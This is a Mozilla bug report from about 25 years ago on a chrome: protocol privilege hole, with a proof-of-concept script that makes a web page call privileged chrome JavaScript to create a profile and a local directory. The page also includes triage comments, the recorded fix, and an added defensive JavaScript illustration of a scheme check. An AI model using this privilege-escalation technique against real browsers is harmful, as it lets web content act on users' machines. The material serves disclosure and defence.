Closed Bug 21144 Opened 25 years ago Closed 25 years ago

[DOGFOOD] Executing JS functions in "chrome:" protocol (creating local directories and profiles)

Categories

(Core :: Security, defect, P3)

x86
Windows 95
defect


VERIFIED FIXED

People

(Reporter: joro, Assigned: norrisboyd)


Details

(Whiteboard: [PDT-]reviewed fix in hand)

There is a vulnerability, which allows executing JavaScript functions in the
"chrome:" protocol.
This is dangerous because such functions have many more privileges than
JavaScript functions loaded from a web page.
If one opens a "chrome:" url in a window, he has access to all functions in the
window and the functions are executed by "windowname.functionname()" in the
"chrome:" protocol.
Some of the predefined functions in the Mozilla chrome may do dangerous things.
This demonstration creates a profile named "georgi" and creates the directory
"c:\georgi".
The code is:
-------------------------------------------------------------------------
<SCRIPT>
b=window.open("","victim");
function g()
{
b.profile.createNewProfile("georgi","c:\\georgi\\");
}
setTimeout("document.forms[0].submit()",1000);
setTimeout("g()",4000);
</SCRIPT>
<FORM ACTION="chrome://profile/content/createProfileWizard.xul" TARGET="victim"
METHOD="POST">
</FORM>
-------------------------------------------------------------------------
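The class of check this report calls for, written here as an added illustration: it is not code from the report, nor Mozilla's actual fix in nsFormFrame.cpp (whose logic the thread does not show). The policy modelled is that only a document itself loaded from chrome: may submit a form to a chrome: URL; the function names, the rules and the sample URLs are assumptions.

```javascript
// Added illustration, not Mozilla's fix: a scheme-based policy for form
// submissions. Function names and rules are assumptions for this example.

// Return the URL scheme, lower-cased (RFC 3986 scheme syntax), or null when
// the reference has no scheme (i.e. it is relative).
function schemeOf(url) {
  const m = /^\s*([a-z][a-z0-9+.-]*):/i.exec(url);
  return m ? m[1].toLowerCase() : null;
}

// Resolve a possibly relative form action against the submitting document's
// URL, so that "wizard.xul" inside a chrome document is recognised as chrome:
// and leading whitespace / mixed-case schemes are normalised.
function resolveAction(action, documentUrl) {
  return new URL(action, documentUrl).href;
}

// Policy decision. The target window name and HTTP method are irrelevant:
// what matters is the scheme of the submitting document versus the scheme
// of the resolved action URL.
function canSubmitFormTo(documentUrl, action) {
  let resolved;
  try {
    resolved = resolveAction(action, documentUrl);
  } catch (e) {
    return { allowed: false, reason: "unparseable action URL" };
  }
  const targetScheme = schemeOf(resolved);
  const sourceScheme = schemeOf(documentUrl);
  if (targetScheme === "chrome" && sourceScheme !== "chrome") {
    return { allowed: false,
             reason: "content (" + sourceScheme + ":) may not submit to chrome:" };
  }
  return { allowed: true, reason: "ok" };
}

// Constructed sample: the report's action URL submitted from a web page.
console.log(canSubmitFormTo("http://content.example/page.html",
                            "chrome://profile/content/createProfileWizard.xul"));
```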
Status: NEW → ASSIGNED
Summary: Executing JS functions in "chrome:" protocol (creating local directories and profiles) → [DOGFOOD] Executing JS functions in "chrome:" protocol (creating local directories and profiles)
Marking dogfood for PDT consideration.
Jim Roskind asked:
>Can you make some comments about this bug?  Can the content arrive from
>outside, or is it restricted to stuff on the local
>disk?  Is there any obvious attackable script sitting locally?

This bug allows access to all functions defined in chrome. This is the
equivalent of a Java applet being able to call all methods of all classes in the
system. We haven't reviewed the whole of the JavaScript defined in chrome since
the model is to prevent access to all of it, but I would be very surprised if
there weren't many opportunities for exploitation.
Whiteboard: reviewed fix in hand
Whiteboard: reviewed fix in hand → [PDT-]reviewed fix in hand
Target Milestone: M12
Putting on PDT- radar.  But it's good for M12...please see chofmann for approval
to check in.
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Fixed:

Checking in nsFormFrame.cpp;
/m/pub/mozilla/layout/html/forms/src/nsFormFrame.cpp,v  <--  nsFormFrame.cpp
new revision: 3.86; previous revision: 3.85
done
Status: RESOLVED → VERIFIED
Verified fixed.
Bulk moving all Browser Security bugs to new Security: General component.  The 
previous Security component for Browser will be deleted.
Component: Security → Security: General